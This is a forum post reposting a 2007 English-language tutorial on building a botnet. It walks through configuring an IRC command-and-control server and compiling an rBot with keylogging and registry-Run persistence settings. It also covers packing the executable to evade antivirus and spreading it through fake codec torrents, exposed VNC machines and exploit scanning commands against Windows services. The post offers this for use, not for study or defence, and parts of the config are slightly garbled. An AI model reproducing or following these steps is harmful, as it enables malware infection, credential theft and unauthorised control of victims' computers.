Jump to content
alexcargo

Cum sa creiezi un botnet

Recommended Posts

Posted

Scuze ca am incalcat regula ca nu e in romana dar mi sa parut interesant

##########################################

######### How to create a botnet #########

##### Created by g7onic - anonym0us ######

############### 10/4/2007 ################

##########################################

I wrote this in 45 mins so don't expect to much ;)

Well since many beginners want to know how botnet and stuff works, im create a little tutorial for the beginners on this site. The tutorial includes how to install a ircd, how to compile a bot & ways to spread.

"Chapters"

1. What is needed

2. How to configure an (unreal)ircd

3. How to compile your bot

4. Make your exe UD

5. Ways of spreading.

Before I begin, my english isn't 100% good, i'll try to translate everything as good as possible, sorry for false lines or words.

1. What is needed

There are many things which are needed for creating a botnet. I'll make a list of stuff which is needed for botnets and explain why they are needed.

- Visual Studio 6.0

http://www.raptorcash.com/vb6/ms%20visual%20studio%20enterprise%206%200%20(viusal%20c++%206%200,%20visual%20basic%206%200%20interdev,%20foxpro%20+%20much%20more)(1).zip

- Visual Studio 6 Service Pack 5

http://download.microsoft.com/download/vstudio60ent/SP5/Wideband-Full/WIN98Me/EN-US/vs6sp5.exe

- Visual Studio 6.0 Processor Pack

http://download.microsoft.com/download/vb60ent/update/6/w9x2kxp/en-us/vcpp5.exe

- Core SDK

http://www.microsoft.com/msdownload/platformsdk/sdkupdate/psdk-full.htm

Safe them somewhere do cmd, cd Directory\of\file and use psdk-full Directory\of\output

Add the following paths to "Tools|Options...|Directories" in Visual Studio 6.0

Under executable files

C:\PROGRAM FILES\MICROSOFT SDK\BIN

Under include files

C:\PROGRAM FILES\MICROSOFT SDK\INCLUDE

Under library files

C:\PROGRAM FILES\MICROSOFT SDK\LIB

NOTE: It is very important that they are at the top of the path lists under Tools|Options|Directories otherwise it will not compile

2. How to configure an (unreal)ircd

Most ircd's are really easy to configurate, especially modded ones. Most of the times you only have to edit the name, the authost, the ircd port & the admin user&pass. What do we have to edit:

oper your-choosen-username { // Edit your choosen name to a username you want 
from {
userhost "yourname@*"; // Edit your name to your emailaddres
};
password "your-choosen-pass"; // Edit your choosen pass to a password you want
class "default";
flags {
netadmin;
services-admin;
global;
helpop;
can_rehash
can_globalnotice;
can_globalroute;
can_globops;
can_wallops;
can_unkline;
can_kline;
can_globalkill;
can_zline;
can_gkline;
can_gzline;
get_umodew;
get_host;
can_override;
can_die;
can_restart;
};
};

Edit the flags here above, if you want to add more ircds owners just copy paste this shit

me  { name "QuakeNet"; info "QuakeNet"; numeric 1; }; 

Here is the Server name, name can be "irc.QuakeNet.org", information is just some info

listen         *:6667; 
easily edit the port to a port which is open, most ports from 6500 -> 7000 are open

Some extra things to edit

hosts { 
local "QuakeNet";
global "QuakeNet";
coadmin "QuakeNet";
admin "QuakeNet";
servicesadmin "QuakeNet";
netadmin "QuakeNet";
host-on-oper-up "yes";
};
};

The sethost's you get if you oper, like [email]g7onic@local.quakenet.org[/email] / [email]g7onic@global.quakenet.org[/email].
And just put "no" in host-on-oper-up if you don't want to get an auto-host selected.

 restrict-channelmodes "ntsuom"; 
modes-on-join "+Mustm";

Edit this to your own options to make your channel secure for you

Now just safe the cfg, and your done with the config. Rar the files and uplaod it to somewhere. What you gotta do now is open a windows box (on vnc??) and download the files and place them in a secure folder, like C:\Windows\????. then just run the exe which allows to start the ircd, or run the batch file which is most there in the modded ircds, you'll see the ircd is running. Don't forget to set a password on the VNC so no-one can catch your oper user&pass, secure all the ports so your botnet don't get sniffed.

Were done with this one now too.

3. How to compile your bot

You probally found a rBot source you like by now, in the url I gave you there were many sources, I've picked a rBot, which is a good bot to start with since it got all standard functions & scanners and it's the easiest bot. ill copy and paste the config and will explain what to do.

// bot configuration (generic) - doesn't need to be encrypted 
int port = 6667;
int port2 = 6667;
int socks4port = 8001;
int tftpport = 69;
int httpport = 5465;
int rloginport = 514;
BOOL topiccmd = TRUE;
BOOL rndfilename = FALSE;
BOOL AutoStart = TRUE;
char prefix = '.';
int maxrand = 8;
int nicktype = CONSTNICK;
BOOL nickprefix = FALSE;

#ifdef DEBUG_LOGGING
char logfile[]="%temp%\\yas.jpg";
#endif

#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!

#else // Recommended to use this only for Crypt() setup, this is unsecure.

char botid[] = "rx-asn-2-re-worked";
char version[] = "v2 by ovelayer";
char password[] = "yourpass";
char server[] = "";
char serverpass[] = "";
char channel[] = "#";
char chanpass[] = "";rd
char server2[] = ""
char channel2[] = "#";
char chanpass2[] = "";
char filename[] = "yourfile.exe";
char keylogfile[] = "keylog.xml"l
char valuename[] = "";
char nickconst[] = "rBot|";
char szLocalPayloadFile[]="yourfile.exe";
char modeonconn[] = "-xi+B";
char exploitchan[] = "#*";
char keylogchan[] = "#*";
char psniffchan[] = "#*";

char *authost[] = {
"yournick@172.0.0.1"
};

char *versionlist[] = {
"mIRC v6.12 Khaled Mardam-Bey",
};

char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
char regkey3[]="Software\\Microsoft\\OLE";
char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";

#endif

#ifdef PLAIN_CRYPT
char key[16] = "39lwmmqopma24ik1"; // CHANGE THIS!!! hmmm..Do I even need this now?
#endif

1. Change the port to the port of your ircd, normally it's 6667, if you got else, just change them.

2. Change the prefix, normally its ".", thats what you have to use before the command so like ".login yourpass".

3. the password, change it to login to your bot ".login unknownpass"

4. the serverpassword, probally you ain't got one but if so edit there.

5. the server, add your IP/DNS There.

6. Your channel, edit your channel where the bots got to join.

7. Your chanpass, change it to be more secure.

8. leave the server 2 of rbot, cuz the code of that thing doesn't work.

9. Change the filename so it won't get killed easily by a user because it's a suspicious virus.

10. the file where the computers puts his keylog shit in, not needed actually.

11. value name, so if your exe is called nod32, then the valuename = Nod32 AntiVirus or something

12. nickconst is the prefix before a bot. like rBot|12312312

13. the modes on connect, you can leave that as it is.

14. exploit channel, if the bot is spreading it will leave it exploit message's there.

15. The keylog & psniff channel, it will send the pstore & keylog messages, but PSNIFF isn't working in rBot so fuck that ;)

16. The authost, you can set your authost like g7onic@*, that will require you to have a nicname with all hosts, you can set *@anonym0us.eu, that will require you to have your host set like anonym0us.eu and you have to most secure one: g7onic@anonym0us.eu this requires you the nickname & the host!.

17. Leave the rest as it is.

Ask for questions, but I think this help you out.

4. Make your exe UD.

Before you start with everything you got to secure your exe, there are packers for, it's hard to get a good packer at this moment, but you can use some public ones which make you exe detected for nod32, kasperspy etc (the big antivirus company's). Your file got to be small so it's easy to spread to other rooted boxes, but also undetected, otherwise a antivirus detect it.

5. Ways of spreading

Their are many different types of spreading, you need bots to start with before you can spread via exploits which are in your bots. There are different ways to get your bots, you can easily ask a mate to let his bots download some bots to your exe which allows you to start a bnet, but you can also spread via torrent just make a torrent with a movie and your exe as "codec" or something, or scan for some vnc's and infect them easily opening ie and open exe (REMOVE HISTORY!).

If you got some bots ( upper 30 bots ) you can start spreading, your bots have different types of exploits in it, asn1smb, lsass, dcom and all standard exploits, Since these are old they won't spread fast, but some of them still work okay on the right range. the standard command to scan with your bots is .advscan exploit <Threads> <seconds> <delay> ip range <flags (use -b-r) so like .advscan asn1smb 80 5 0 255.255.x.x -b -r.

Well this was all, it's just a lil explaination of howto. For questions or addons of you all, just pm me or post it here, ill edit this post.

Grtz,

g7onic

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...